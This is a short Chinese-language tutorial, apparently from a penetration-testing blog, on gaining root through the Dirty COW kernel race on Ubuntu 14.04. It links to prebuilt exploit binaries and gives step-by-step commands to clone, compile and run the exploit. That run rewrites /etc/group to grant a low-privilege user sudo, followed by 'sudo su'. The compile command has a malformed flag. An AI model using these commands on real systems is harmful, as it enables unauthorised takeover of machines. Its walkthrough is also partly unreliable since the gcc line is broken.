脏牛Linux 本地提权

编译好的EXP下载地址: https://github.com/Brucetg/DirtyCow-EXP
该漏洞是 Linux 内核的内存子系统在处理写时拷贝(Copy-on-Write)时存在条件竞争漏洞, 导致可以破坏私有只读内存映射。黑客可以在获取低权限的的本地用户后,利用此漏洞获取 其他只读内存映射的写权限,进一步获取 root 权限。

1.Linux

Ubuntu 14.04 :

1)添加用户:

sudo adduser test 

输入两次密码后一直回车就行,查看当前用户的信息,终端输入 id,回车,可以看到当 前用户是有 sudo 权限的。

切换到刚刚新建的 test 用户,同样输入 id,查看 test 用户的信息,发现 test 用户没有 sudo 权限,

file
2)运行DirtyCow的exp进行提权:

git clone https://github.com/dirtycow/dirtycow.github.io

cd dirtycow.github.io

编译exp:

gcc dirtyc0w.c -o dirtycow lpthread

执行exp:

./dirtycow /etc/group “$(sed ‘/\(sudo*\)/ s/$/,test/’ /etc/group)”

file
新打开一个终端,切换到test,查看test用户信息,可以看到test用户已经拥有了sudo权限,执行sudo su ,输入test用户的密码后就可以切换到root权限,提权成功。
file

给TA买糖
共{{data.count}}人
人已赞赏
渗透测试

cobaltstrike Linux上线 详细版

2021-3-12 13:50:19

渗透测试

命令行下服务器锁屏并获取登录密码

2021-6-30 15:50:46

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
今日签到
有新私信 私信列表
搜索